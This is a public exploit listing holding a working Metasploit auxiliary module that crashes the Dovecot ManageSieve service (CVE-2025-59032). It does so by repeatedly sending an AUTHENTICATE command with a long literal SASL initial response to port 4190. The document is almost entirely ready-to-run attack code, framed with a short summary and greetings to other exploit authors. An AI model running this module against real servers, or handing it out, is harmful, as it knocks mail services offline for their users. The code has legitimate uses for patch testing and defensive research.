Share
## https://sploitus.com/exploit?id=PACKETSTORM:219557
==================================================================================================================================
    | # Title     : Dovecot ManageSieve Crash Denial of Service Metasploit Module                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a Denial of Service (DoS) vulnerability in the Dovecot ManageSieve service, where improper handling of authentication requests can lead to service crashes.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Dos
      include Msf::Exploit::Remote::Tcp
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot ManageSieve Crash DoS',
            'Description' => %q{
              Dovecot ManageSieve service crashes when receiving an AUTHENTICATE command
              with a literal as SASL initial response. This vulnerability can be exploited
              to repeatedly crash the ManageSieve service, making it unavailable for other
              users.
    
              Affects Dovecot CE core 2.4.0-2.4.2 and Dovecot Pro core 3.1.0-3.1.2.
              Fixed in versions 2.4.3 and 3.1.3.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2025-59032'],
              ['URL', 'https://documentation.open-xchange.com/dovecot/security/advisories/html/2026/oxdc-adv-2026-0001.html'],
              ['CWE', '20']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(4190),
          OptInt.new('ATTEMPTS', [true, 'Number of crash attempts', 10])
        ])
      end
    
      def run
        print_status("Dovecot ManageSieve Crash DoS (CVE-2025-59032)")
        print_status("Target: #{peer}")
    
        datastore['ATTEMPTS'].to_i.times do |i|
          print_status("Crash attempt #{i + 1}/#{datastore['ATTEMPTS']}")
          crash_managesieve
          sleep(2)
        end
    
        print_status("DoS attack completed")
      end
    
      def crash_managesieve
        sock = nil
    
        begin
          sock = connect
    
          banner = sock.get_once
          vprint_status("ManageSieve banner: #{banner}")
    
          payload_data = "A" * 1000
          literal = "{#{payload_data.length}}\r\n"
    
          malicious_payload = "AUTHENTICATE \"PLAIN\" #{literal}"
          malicious_payload += payload_data + "\r\n"
    
          sock.put(malicious_payload)
    
          response = sock.get_once(5)
    
          if response.nil?
            print_good("ManageSieve service crashed (no response)")
          else
            vprint_status("Response: #{response}")
          end
    
        rescue ::Errno::ECONNRESET, ::Rex::ConnectionRefused
          print_good("ManageSieve service crashed (connection reset)")
        rescue ::Exception => e
          print_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================